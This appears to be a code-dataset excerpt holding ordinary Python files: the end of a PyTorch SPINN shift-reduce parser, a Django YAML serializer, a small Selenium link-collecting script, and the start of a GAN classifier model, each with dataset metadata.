use_skips else 2)\n\n # Predict 2 or 3 actions depending on whether SKIPs will be predicted.\n choices = [T_SHIFT, 
T_REDUCE, T_SKIP] if use_skips else [T_SHIFT, T_REDUCE]\n self.choices = np.array(choices, dtype=np.int32)\n\n def reset_state(self):\n self.memories = []\n\n def forward(self, example, use_internal_parser=False, validate_transitions=True):\n self.buffers_n = (example.tokens.data != 0).long().sum(1).view(-1).tolist()\n\n if self.debug:\n seq_length = example.tokens.size(1)\n assert all(buf_n <= (seq_length + 1) // 2 for buf_n in self.buffers_n), \\\n \"All sentences (including cropped) must be the appropriate length.\"\n\n self.bufs = example.bufs\n\n # Notes on adding zeros to bufs/stacks.\n # - After the buffer is consumed, we need one zero on the buffer\n # used as input to the tracker.\n # - For the first two steps, the stack would be empty, but we add\n # zeros so that the tracker still gets input.\n zeros = to_gpu(Variable(torch.from_numpy(\n np.zeros(self.bufs[0][0].size(), dtype=np.float32)),\n volatile=self.bufs[0][0].volatile))\n\n # Trim unused tokens.\n self.bufs = [[zeros] + b[-b_n:] for b, b_n in zip(self.bufs, self.buffers_n)]\n\n self.stacks = [[zeros, zeros] for buf in self.bufs]\n\n if hasattr(self, 'tracker'):\n self.tracker.reset_state()\n if not hasattr(example, 'transitions'):\n # TODO: Support no transitions. In the meantime, must at least pass dummy transitions.\n raise ValueError('Transitions must be included.')\n self.forward_hook()\n return self.run(example.transitions,\n run_internal_parser=True,\n use_internal_parser=use_internal_parser,\n validate_transitions=validate_transitions)\n\n def forward_hook(self):\n pass\n\n def validate(self, transitions, preds, stacks, bufs, zero_padded=True):\n # Note: There is one zero added to bufs, and two zeros added to stacks.\n # Make sure to adjust for this if using lengths of either.\n buf_adjust = 1 if zero_padded else 0\n stack_adjust = 2 if zero_padded else 0\n\n _transitions = np.array(transitions)\n\n # Fixup predicted skips.\n if len(self.choices) > 2:\n raise NotImplementedError(\"Can only validate actions for 2 choices right now.\")\n\n buf_lens = [len(buf) - buf_adjust for buf in bufs]\n stack_lens = [len(stack) - stack_adjust for stack in stacks]\n\n # Cannot reduce on too small a stack\n must_shift = np.array([length < 2 for length in stack_lens])\n preds[must_shift] = T_SHIFT\n\n # Cannot shift on too small buf\n must_reduce = np.array([length < 1 for length in buf_lens])\n preds[must_reduce] = T_REDUCE\n\n # If the given action is skip, then must skip.\n preds[_transitions == T_SKIP] = T_SKIP\n\n return preds\n\n def predict_actions(self, transition_output, cant_skip):\n transition_dist = F.log_softmax(transition_output)\n transition_dist = transition_dist.data.cpu().numpy()\n transition_preds = transition_dist.argmax(axis=1)\n return transition_preds\n\n def get_statistics(self):\n # TODO: These are not necessarily the most efficient flatten operations...\n\n t_preds = np.array(reduce(lambda x, y: x + y.tolist(),\n [m[\"t_preds\"] for m in self.memories], []))\n t_given = np.array(reduce(lambda x, y: x + y.tolist(),\n [m[\"t_given\"] for m in self.memories], []))\n t_mask = np.array(reduce(lambda x, y: x + y.tolist(),\n [m[\"t_mask\"] for m in self.memories], []))\n t_logits = [m[\"t_logits\"] for m in self.memories]\n if len(t_logits) > 0:\n t_logits = torch.cat(t_logits, 0)\n\n return t_preds, t_logits, t_given, t_mask\n\n def get_transition_preds_per_example(self):\n t_preds, t_logits, t_given, t_mask = self.get_statistics()\n\n batch_size = t_mask.max()\n preds = []\n for batch_idx in 
range(batch_size):\n preds.append(t_preds[t_mask == batch_idx])\n\n return np.array(preds)\n\n def t_shift(self, buf, stack, tracking, buf_tops, trackings):\n \"\"\"SHIFT: Should dequeue buffer and item to stack.\"\"\"\n buf_tops.append(buf.pop())\n trackings.append(tracking)\n\n def t_reduce(self, buf, stack, tracking, lefts, rights, trackings):\n \"\"\"REDUCE: Should compose top two items of the stack into new item.\"\"\"\n\n # The right-most input will be popped first.\n for reduce_inp in [rights, lefts]:\n if len(stack) > 0:\n reduce_inp.append(stack.pop())\n else:\n if self.debug:\n raise IndexError\n # If we try to Reduce, but there are less than 2 items on the stack,\n # then treat any available item as the right input, and use zeros\n # for any other inputs.\n # NOTE: Only happens on cropped data.\n zeros = to_gpu(Variable(\n torch.from_numpy(np.zeros(buf[0].size(), dtype=np.float32)),\n volatile=buf[0].volatile))\n reduce_inp.append(zeros)\n\n trackings.append(tracking)\n\n def t_skip(self):\n \"\"\"SKIP: Acts as padding and is a noop.\"\"\"\n pass\n\n def shift_phase(self, tops, trackings, stacks, idxs):\n \"\"\"SHIFT: Should dequeue buffer and item to stack.\"\"\"\n if len(stacks) > 0:\n shift_candidates = iter(tops)\n for stack in stacks:\n new_stack_item = next(shift_candidates)\n stack.append(new_stack_item)\n def shift_phase_hook(self, tops, trackings, stacks, idxs):\n pass\n\n def reduce_phase(self, lefts, rights, trackings, stacks):\n if len(stacks) > 0:\n reduced = iter(self.reduce(\n lefts, rights, trackings))\n for stack in stacks:\n new_stack_item = next(reduced)\n stack.append(new_stack_item)\n\n def reduce_phase_hook(self, lefts, rights, trackings, reduce_stacks):\n pass\n\n def loss_phase_hook(self):\n pass\n\n def run(self, inp_transitions, run_internal_parser=False, use_internal_parser=False, validate_transitions=True):\n transition_loss = None\n transition_acc = 0.0\n num_transitions = inp_transitions.shape[1]\n\n # Transition Loop\n # ===============\n\n for t_step in range(num_transitions):\n transitions = inp_transitions[:, t_step]\n transition_arr = list(transitions)\n sub_batch_size = len(transition_arr)\n\n # A mask to select all non-SKIP transitions.\n cant_skip = np.array([t != T_SKIP for t in transitions])\n\n # Remember important details from this time step.\n self.memory = {}\n\n # Run if:\n # A. We have a tracking component and,\n # B. There is at least one transition that will not be skipped.\n if hasattr(self, 'tracker') and (self.use_skips or sum(cant_skip) > 0):\n\n # Prepare tracker input.\n try:\n top_buf = bundle(buf[-1] for buf in self.bufs)\n top_stack_1 = bundle(stack[-1] for stack in self.stacks)\n top_stack_2 = bundle(stack[-2] for stack in self.stacks)\n except:\n # To elaborate on this exception, when cropping examples it is possible\n # that your first 1 or 2 actions is a reduce action. It is unclear if this\n # is a bug in cropping or a bug in how we think about cropping. In the meantime,\n # turn on the truncate batch flag, and set the eval_seq_length very high.\n raise NotImplementedError(\"Warning: You are probably trying to encode examples\"\n \"with cropped transitions. Although, this is a reasonable\"\n \"feature, when predicting/validating transitions, you\"\n \"probably will not get the behavior that you expect. 
Disable\"\n \"this exception if you dare.\")\n # Uncomment to handle weirdly placed actions like discussed in the above exception.\n # =========\n # zeros = to_gpu(Variable(torch.from_numpy(\n # np.zeros(self.bufs[0][0].size(), dtype=np.float32)),\n # volatile=self.bufs[0][0].volatile))\n # top_buf = bundle(buf[-1] for buf in self.bufs)\n # top_stack_1 = bundle(stack[-1] if len(stack) > 0 else zeros for stack in self.stacks)\n # top_stack_2 = bundle(stack[-2] if len(stack) > 1 else zeros for stack in self.stacks)\n\n # Get hidden output from the tracker. Used to predict transitions.\n tracker_h, tracker_c = self.tracker(top_buf, top_stack_1, top_stack_2)\n\n if hasattr(self, 'transition_net'):\n transition_output = self.transition_net(tracker_h)\n\n if hasattr(self, 'transition_net') and run_internal_parser:\n\n # Predict Actions\n # ===============\n\n t_logits = F.log_softmax(transition_output)\n t_given = transitions\n # TODO: Mask before predicting. This should simplify things and reduce computation.\n # The downside is that in the Action Phase, need to be smarter about which stacks/bufs\n # are selected.\n transition_preds = self.predict_actions(transition_output, cant_skip)\n\n # Constrain to valid actions\n # ==========================\n\n if validate_transitions:\n transition_preds = self.validate(transition_arr, transition_preds, self.stacks, self.bufs)\n\n t_preds = transition_preds\n\n # Indices of examples that have a transition.\n t_mask = np.arange(sub_batch_size)\n\n # Filter to non-SKIP values\n # =========================\n\n if not self.use_skips:\n t_preds = t_preds[cant_skip]\n t_given = t_given[cant_skip]\n t_mask = t_mask[cant_skip]\n\n # Be careful when filtering distributions. These values are used to\n # calculate loss and need to be used in backprop.\n index = (cant_skip * np.arange(cant_skip.shape[0]))[cant_skip]\n index = to_gpu(Variable(torch.from_numpy(index).long(), volatile=t_logits.volatile))\n t_logits = torch.index_select(t_logits, 0, index)\n\n\n # Memories\n # ========\n # Keep track of key values to determine accuracy and loss.\n # (optional) Filter to only non-skipped transitions. When filtering values\n # that will be backpropagated over, be careful that gradient flow isn't broken.\n\n # Actual transition predictions. 
Used to measure transition accuracy.\n self.memory[\"t_preds\"] = t_preds\n\n # Distribution of transitions use to calculate transition loss.\n self.memory[\"t_logits\"] = t_logits\n\n # Given transitions.\n self.memory[\"t_given\"] = t_given\n\n # Record step index.\n self.memory[\"t_mask\"] = t_mask\n\n # TODO: Write tests to make sure memories look right in the various settings.\n\n # If this FLAG is set, then use the predicted actions rather than the given.\n if use_internal_parser:\n transition_arr = transition_preds.tolist()\n\n # Pre-Action Phase\n # ================\n\n # For SHIFT\n s_stacks, s_tops, s_trackings, s_idxs = [], [], [], []\n\n # For REDUCE\n r_stacks, r_lefts, r_rights, r_trackings, r_idxs = [], [], [], [], []\n\n batch = zip(transition_arr, self.bufs, self.stacks,\n self.tracker.states if hasattr(self, 'tracker') and self.tracker.h is not None\n else itertools.repeat(None))\n\n for batch_idx, (transition, buf, stack, tracking) in enumerate(batch):\n if transition == T_SHIFT: # shift\n self.t_shift(buf, stack, tracking, s_tops, s_trackings)\n s_idxs.append(batch_idx)\n s_stacks.append(stack)\n elif transition == T_REDUCE: # reduce\n self.t_reduce(buf, stack, tracking, r_lefts, r_rights, r_trackings)\n r_stacks.append(stack)\n r_idxs.append(batch_idx)\n elif transition == T_SKIP: # skip\n self.t_skip()\n\n # Action Phase\n # ============\n\n self.shift_phase(s_tops, s_trackings, s_stacks, s_idxs)\n self.shift_phase_hook(s_tops, s_trackings, s_stacks, s_idxs)\n self.reduce_phase(r_lefts, r_rights, r_trackings, r_stacks)\n self.reduce_phase_hook(r_lefts, r_rights, r_trackings, r_stacks, r_idxs=r_idxs)\n\n # Memory Phase\n # ============\n\n self.memories.append(self.memory)\n\n # Loss Phase\n # ==========\n\n if hasattr(self, 'tracker') and hasattr(self, 'transition_net'):\n t_preds, t_logits, t_given, _ = self.get_statistics()\n\n # We compute accuracy and loss after all transitions have complete,\n # since examples can have different lengths when not using skips.\n transition_acc = (t_preds == t_given).sum() / float(t_preds.shape[0])\n transition_loss = nn.NLLLoss()(t_logits, to_gpu(Variable(\n torch.from_numpy(t_given), volatile=t_logits.volatile)))\n transition_loss *= self.transition_weight\n\n self.loss_phase_hook()\n\n if self.debug:\n assert all(len(stack) == 3 for stack in self.stacks), \\\n \"Stacks should be fully reduced and have 3 elements: \" \\\n \"two zeros and the sentence encoding.\"\n assert all(len(buf) == 1 for buf in self.bufs), \\\n \"Stacks should be fully shifted and have 1 zero.\"\n\n return [stack[-1] for stack in self.stacks], transition_acc, transition_loss\n\n\nclass BaseModel(nn.Module):\n\n optimize_transition_loss = True\n\n def __init__(self, model_dim=None,\n word_embedding_dim=None,\n vocab_size=None,\n initial_embeddings=None,\n num_classes=None,\n mlp_dim=None,\n embedding_keep_rate=None,\n classifier_keep_rate=None,\n tracking_lstm_hidden_dim=4,\n transition_weight=None,\n encode_style=None,\n encode_reverse=None,\n encode_bidirectional=None,\n encode_num_layers=None,\n use_skips=False,\n lateral_tracking=None,\n use_tracking_in_composition=None,\n use_sentence_pair=False,\n use_difference_feature=False,\n use_product_feature=False,\n num_mlp_layers=None,\n mlp_bn=None,\n use_projection=None,\n **kwargs\n ):\n super(BaseModel, self).__init__()\n\n self.use_sentence_pair = use_sentence_pair\n self.use_difference_feature = use_difference_feature\n self.use_product_feature = use_product_feature\n self.hidden_dim = hidden_dim = 
model_dim / 2\n\n args = Args()\n args.lateral_tracking = lateral_tracking\n args.use_tracking_in_composition = use_tracking_in_composition\n args.size = model_dim/2\n args.tracker_size = tracking_lstm_hidden_dim\n args.transition_weight = transition_weight\n\n self.initial_embeddings = initial_embeddings\n self.word_embedding_dim = word_embedding_dim\n self.model_dim = model_dim\n classifier_dropout_rate = 1. - classifier_keep_rate\n\n vocab = Vocab()\n vocab.size = initial_embeddings.shape[0] if initial_embeddings is not None else vocab_size\n vocab.vectors = initial_embeddings\n\n # Build parsing component.\n self.spinn = self.build_spinn(args, vocab, use_skips)\n\n # Build classiifer.\n features_dim = self.get_features_dim()\n self.mlp = MLP(features_dim, mlp_dim, num_classes,\n num_mlp_layers, mlp_bn, classifier_dropout_rate)\n\n # The input embeddings represent the hidden and cell state, so multiply by 2.\n self.embedding_dropout_rate = 1. - embedding_keep_rate\n input_embedding_dim = args.size * 2\n\n # Projection will effectively be done by the encoding network.\n use_projection = True if encode_style is None else False\n\n # Create dynamic embedding layer.\n self.embed = Embed(input_embedding_dim, vocab.size, vectors=vocab.vectors, use_projection=use_projection)\n\n # Optionally build input encoder.\n if encode_style is not None:\n self.encode = self.build_input_encoder(encode_style=encode_style,\n word_embedding_dim=word_embedding_dim, model_dim=model_dim,\n num_layers=encode_num_layers, bidirectional=encode_bidirectional, reverse=encode_reverse,\n dropout=self.embedding_dropout_rate)\n\n def get_features_dim(self):\n features_dim = self.hidden_dim * 2 if self.use_sentence_pair else self.hidden_dim\n if self.use_sentence_pair:\n if self.use_difference_feature:\n features_dim += self.hidden_dim\n if self.use_product_feature:\n features_dim += self.hidden_dim\n return features_dim\n\n def build_features(self, h):\n if self.use_sentence_pair:\n h_prem, h_hyp = h\n features = [h_prem, h_hyp]\n if self.use_difference_feature:\n features.append(h_prem - h_hyp)\n if self.use_product_feature:\n features.append(h_prem * h_hyp)\n features = torch.cat(features, 1)\n else:\n features = h[0]\n return features\n\n def build_input_encoder(self, encode_style=\"LSTM\", word_embedding_dim=None, model_dim=None,\n num_layers=None, bidirectional=None, reverse=None, dropout=None):\n if encode_style == \"LSTM\":\n encoding_net = LSTM(word_embedding_dim, model_dim,\n num_layers=num_layers, bidirectional=bidirectional, reverse=reverse,\n dropout=dropout)\n else:\n raise NotImplementedError\n return encoding_net\n\n def build_spinn(self, args, vocab, use_skips):\n return SPINN(args, vocab, use_skips=use_skips)\n\n def build_example(self, sentences, transitions):\n raise Exception('Not implemented.')\n\n def spinn_hook(self, state):\n pass\n\n def run_spinn(self, example, use_internal_parser, validate_transitions=True):\n self.spinn.reset_state()\n state, transition_acc, transition_loss = self.spinn(example,\n use_internal_parser=use_internal_parser,\n validate_transitions=validate_transitions)\n self.spinn_hook(state)\n return state, transition_acc, transition_loss\n\n def output_hook(self, output, sentences, transitions, y_batch=None):\n pass\n\n def forward(self, sentences, transitions, y_batch=None,\n use_internal_parser=False, validate_transitions=True):\n example = self.build_example(sentences, transitions)\n\n b, l = example.tokens.size()[:2]\n\n embeds = self.embed(example.tokens)\n embeds = 
F.dropout(embeds, self.embedding_dropout_rate, training=self.training)\n embeds = torch.chunk(to_cpu(embeds), b, 0)\n\n if hasattr(self, 'encode'):\n to_encode = torch.cat([e.unsqueeze(0) for e in embeds], 0)\n encoded = self.encode(to_encode)\n embeds = [x.squeeze() for x in torch.chunk(encoded, b, 0)]\n\n # Make Buffers\n embeds = [torch.chunk(x, l, 0) for x in embeds]\n buffers = [list(reversed(x)) for x in embeds]\n\n example.bufs = buffers\n\n h, transition_acc, transition_loss = self.run_spinn(example, use_internal_parser, validate_transitions)\n\n self.spinn_outp = h\n\n self.transition_acc = transition_acc\n self.transition_loss = transition_loss\n\n # Build features\n features = self.build_features(h)\n\n output = self.mlp(features)\n\n self.output_hook(output, sentences, transitions, y_batch)\n\n return output\n\n\nclass SentencePairModel(BaseModel):\n\n def build_example(self, sentences, transitions):\n batch_size = sentences.shape[0]\n\n # Build Tokens\n x_prem = sentences[:,:,0]\n x_hyp = sentences[:,:,1]\n x = np.concatenate([x_prem, x_hyp], axis=0)\n\n # Build Transitions\n t_prem = transitions[:,:,0]\n t_hyp = transitions[:,:,1]\n t = np.concatenate([t_prem, t_hyp], axis=0)\n\n example = Example()\n example.tokens = to_gpu(Variable(torch.from_numpy(x), volatile=not self.training))\n example.transitions = t\n\n return example\n\n def run_spinn(self, example, use_internal_parser=False, validate_transitions=True):\n state_both, transition_acc, transition_loss = super(SentencePairModel, self).run_spinn(\n example, use_internal_parser, validate_transitions)\n batch_size = len(state_both) / 2\n h_premise = get_h(torch.cat(state_both[:batch_size], 0), self.hidden_dim)\n h_hypothesis = get_h(torch.cat(state_both[batch_size:], 0), self.hidden_dim)\n return [h_premise, h_hypothesis], transition_acc, transition_loss\n\n\nclass SentenceModel(BaseModel):\n\n def build_example(self, sentences, transitions):\n batch_size = sentences.shape[0]\n\n # Build Tokens\n x = sentences\n\n # Build Transitions\n t = transitions\n\n example = Example()\n example.tokens = to_gpu(Variable(torch.from_numpy(x), volatile=not self.training))\n example.transitions = t\n\n return example\n\n def run_spinn(self, example, use_internal_parser=False, validate_transitions=True):\n state, transition_acc, transition_loss = super(SentenceModel, self).run_spinn(\n example, use_internal_parser, validate_transitions)\n h = get_h(torch.cat(state, 0), self.hidden_dim)\n return [h], transition_acc, transition_loss\n", "sub_path": "python/spinn/fat_stack.py", "file_name": "fat_stack.py", "file_ext": "py", "file_size_in_byte": 26520, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "spinn.util.blocks.BaseSentencePairTrainer", "line_number": 37, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 43, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 43, "usage_type": "name"}, {"api_name": "spinn.util.blocks.Linear", "line_number": 49, "usage_type": "call"}, {"api_name": "spinn.util.blocks.Linear", "line_number": 50, "usage_type": "call"}, {"api_name": "spinn.util.blocks.Linear", "line_number": 51, "usage_type": "call"}, {"api_name": "spinn.util.blocks.Linear", "line_number": 54, "usage_type": "call"}, {"api_name": "spinn.util.blocks.HeKaimingInitializer", "line_number": 54, "usage_type": "name"}, {"api_name": "spinn.util.blocks.Linear", "line_number": 56, "usage_type": "call"}, {"api_name": 
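SPINN's `run()` above consumes a per-step transition sequence, shifting buffer tops onto per-example stacks and composing the top two stack entries on a reduce. A toy sketch of that control flow with plain lists, where `compose` stands in for the Reduce network (names are illustrative):

```python
# Toy shift-reduce walk mirroring SPINN.run(); plain Python for clarity.
T_SHIFT, T_REDUCE, T_SKIP = 0, 1, 2

def run_transitions(tokens, transitions, compose=lambda l, r: (l, r)):
    buf = list(reversed(tokens))   # pop() takes the leftmost token first
    stack = []
    for t in transitions:
        if t == T_SHIFT:
            stack.append(buf.pop())
        elif t == T_REDUCE:
            right, left = stack.pop(), stack.pop()   # right-most input pops first
            stack.append(compose(left, right))
        # T_SKIP is padding: no-op
    return stack[-1]               # the sentence encoding

assert run_transitions(['a', 'b'], [T_SHIFT, T_SHIFT, T_REDUCE]) == ('a', 'b')
```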
"spinn.util.blocks.HeKaimingInitializer", "line_number": 56, "usage_type": "name"}, {"api_name": "spinn.util.blocks.to_gpu", "line_number": 77, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 77, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 79, "usage_type": "attribute"}, {"api_name": "spinn.util.blocks.lstm", "line_number": 83, "usage_type": "call"}, {"api_name": "spinn.util.blocks.unbundle", "line_number": 92, "usage_type": "call"}, {"api_name": "spinn.util.blocks.bundle", "line_number": 97, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 101, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 101, "usage_type": "name"}, {"api_name": "spinn.util.blocks.Reduce", "line_number": 113, "usage_type": "call"}, {"api_name": "torch.nn.Linear", "line_number": 118, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 118, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 122, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 122, "usage_type": "attribute"}, {"api_name": "spinn.util.blocks.to_gpu", "line_number": 142, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 142, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 142, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 143, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 143, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 171, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 181, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 185, "usage_type": "call"}, {"api_name": "torch.nn.functional.log_softmax", "line_number": 194, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 194, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 202, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 204, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 206, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 210, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 222, "usage_type": "call"}, {"api_name": "spinn.util.blocks.to_gpu", "line_number": 243, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 243, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 244, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 244, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 244, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 292, "usage_type": "call"}, {"api_name": "spinn.util.blocks.bundle", "line_number": 304, "usage_type": "call"}, {"api_name": "spinn.util.blocks.bundle", "line_number": 305, "usage_type": "call"}, {"api_name": "spinn.util.blocks.bundle", "line_number": 306, "usage_type": "call"}, {"api_name": "torch.nn.functional.log_softmax", "line_number": 337, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 337, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 353, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 365, "usage_type": "call"}, {"api_name": "spinn.util.blocks.to_gpu", "line_number": 366, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 366, 
"usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 366, "usage_type": "call"}, {"api_name": "torch.index_select", "line_number": 367, "usage_type": "call"}, {"api_name": "itertools.repeat", "line_number": 405, "usage_type": "call"}, {"api_name": "torch.nn.NLLLoss", "line_number": 441, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 441, "usage_type": "name"}, {"api_name": "spinn.util.blocks.to_gpu", "line_number": 441, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 441, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 442, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 457, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 457, "usage_type": "name"}, {"api_name": "spinn.util.misc.Args", "line_number": 493, "usage_type": "call"}, {"api_name": "spinn.util.misc.Vocab", "line_number": 505, "usage_type": "call"}, {"api_name": "spinn.util.blocks.MLP", "line_number": 514, "usage_type": "call"}, {"api_name": "spinn.util.blocks.Embed", "line_number": 525, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 551, "usage_type": "call"}, {"api_name": "spinn.util.blocks.LSTM", "line_number": 559, "usage_type": "call"}, {"api_name": "torch.nn.functional.dropout", "line_number": 593, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 593, "usage_type": "name"}, {"api_name": "torch.chunk", "line_number": 594, "usage_type": "call"}, {"api_name": "spinn.util.blocks.to_cpu", "line_number": 594, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 597, "usage_type": "call"}, {"api_name": "torch.chunk", "line_number": 599, "usage_type": "call"}, {"api_name": "torch.chunk", "line_number": 602, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 632, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 637, "usage_type": "call"}, {"api_name": "spinn.util.misc.Example", "line_number": 639, "usage_type": "call"}, {"api_name": "spinn.util.blocks.to_gpu", "line_number": 640, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 640, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 640, "usage_type": "call"}, {"api_name": "spinn.util.blocks.get_h", "line_number": 649, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 649, "usage_type": "call"}, {"api_name": "spinn.util.blocks.get_h", "line_number": 650, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 650, "usage_type": "call"}, {"api_name": "spinn.util.misc.Example", "line_number": 665, "usage_type": "call"}, {"api_name": "spinn.util.blocks.to_gpu", "line_number": 666, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 666, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 666, "usage_type": "call"}, {"api_name": "spinn.util.blocks.get_h", "line_number": 674, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 674, "usage_type": "call"}]} +{"seq_id": "195497707", "text": "\"\"\" pretty serialization for yaml \"\"\"\nimport yaml\nfrom django.core.serializers.pyyaml import ( # IGNORE:W0611\n Serializer as YamlSerializer, DjangoSafeDumper,\n Deserializer) # @UnusedImport\n\n\nclass Serializer(YamlSerializer):\n \"\"\" utf8-friendly dumpdata management command \"\"\"\n def end_serialization(self):\n yaml.dump(self.objects, self.stream, allow_unicode=True,\n default_flow_style=False,\n Dumper=DjangoSafeDumper, **self.options)", 
"sub_path": "serializers/yaml.py", "file_name": "yaml.py", "file_ext": "py", "file_size_in_byte": 488, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "django.core.serializers.pyyaml.Serializer", "line_number": 8, "usage_type": "name"}, {"api_name": "yaml.dump", "line_number": 11, "usage_type": "call"}, {"api_name": "django.core.serializers.pyyaml.DjangoSafeDumper", "line_number": 13, "usage_type": "name"}]} +{"seq_id": "281170928", "text": "from selenium import webdriver\r\n\r\ndriver = webdriver.Chrome('C:\\\\Users\\\\humbl\\\\Downloads\\\\chromedriver_win32\\\\chromedriver.exe')\r\n\r\ndriver.maximize_window()\r\ndriver.get(\"https://tradus.com/\")\r\n\r\nlinks = set()\r\nelems = driver.find_elements_by_xpath(\"//a[@href]\")\r\n\r\nopen('Output1.txt', 'w').close()\r\n\r\ntext_file = open('Output1.txt', \"a\")\r\n\r\nfor elem in elems:\r\n link = str(elem.get_attribute(\"href\"))\r\n if \"https\" in link:\r\n links.add(link)\r\n\r\nno = 0\r\n\r\nfor link in links:\r\n no=no+1\r\n text_file.write(\"Link \"+str(no)+\": \" +str(link)+\"\\n\\n\")\r\n\r\ntext_file.close()\r\n\r\ndriver.quit()\r\n\r\n", "sub_path": "Tradus - Navigation/Navigation.py", "file_name": "Navigation.py", "file_ext": "py", "file_size_in_byte": 601, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "selenium.webdriver.Chrome", "line_number": 3, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 3, "usage_type": "name"}]} +{"seq_id": "243399521", "text": "import torch\nfrom .base_model import BaseModel\nfrom . import networks\nimport numpy as np\n\n\nclass Classifier128Model(BaseModel):\n @staticmethod\n def modify_commandline_options(parser, is_train=True):\n parser.set_defaults(dataset_mode='categorical', preprocess='resize', load_size=512, input_nc=3, output_nc=3, no_flip=True)\n parser.set_defaults(save_epoch_freq=10, display_id=0, niter=20, niter_decay=0, lr=0.00001)\n parser.add_argument('--n_class', type=int, default=2, help='')\n parser.add_argument('--n_aggressive', type=int, default=10, help='')\n parser.add_argument('--threshold_increase', type=float, default=0.2, help='')\n parser.add_argument('--max_threshold', type=float, default=0.8, help='')\n parser.add_argument('--class_csv', type=str, default='class.csv', help='')\n return parser\n\n def __init__(self, opt):\n BaseModel.__init__(self, opt)\n # specify the training losses you want to print out. The training/test scripts will call \n self.loss_names = ['G', 'D', 'Class']\n # specify the images you want to save/display. The training/test scripts will call \n self.visual_names = ['full_image', 'labelsG', 'labelsD', 'labelsC']\n # specify the models you want to save to the disk. 
The training/test scripts will call and \n self.model_names = ['G', 'D', 'Classifier']\n # define networks\n self.netG = networks.StyledGenerator128(opt.input_nc, opt.output_nc, opt.n_class, 'classify')\n self.netD = networks.StyledDiscriminator(opt.input_nc, opt.n_class, 'classify')\n self.netClassifier = networks.StyledDiscriminator(opt.input_nc, opt.n_class, 'classify')\n self.netG = networks.init_net(self.netG, opt.init_type, opt.init_gain, self.gpu_ids)\n self.netD = networks.init_net(self.netD, opt.init_type, opt.init_gain, self.gpu_ids)\n self.netClassifier = networks.init_net(self.netClassifier, opt.init_type, opt.init_gain, self.gpu_ids)\n\n self.colors = [[1, -1, -1], [1, 0, -1], [1, 1, -1], [-1, 1, -1], [-1, 1, 1], [-1, -1, 1]]\n self.colors[self.opt.n_class - 1] = [0, 0, 0]\n\n\n if self.isTrain:\n # define loss functions\n #weights = torch.FloatTensor([1 if i != opt.n_class - 1 else 1 / opt.n_class for i in range(opt.n_class)]).to(self.device)\n self.criterion = torch.nn.CrossEntropyLoss()\n self.threshold = 0\n self.softmax = torch.nn.Softmax(dim=1)\n # initialize optimizers; schedulers will be automatically created by function .\n self.optimizer_G = torch.optim.Adam(self.netG.parameters(), lr=opt.lr, betas=(opt.beta1, 0.999))\n self.optimizer_D = torch.optim.Adam(self.netD.parameters(), lr=opt.lr, betas=(opt.beta1, 0.999))\n self.optimizer_netClassifier = torch.optim.Adam(self.netClassifier.parameters(), lr=opt.lr, betas=(opt.beta1, 0.999))\n self.optimizers.append(self.optimizer_G)\n self.optimizers.append(self.optimizer_D)\n self.optimizers.append(self.optimizer_netClassifier)\n\n def set_input(self, input):\n \"\"\"Unpack input data from the dataloader and perform necessary pre-processing steps.\n\n Parameters:\n input (dict): include the data itself and its metadata information.\n\n The option 'direction' can be used to swap images in domain A and domain B.\n \"\"\"\n self.full_image = input['image'].to(self.device)\n 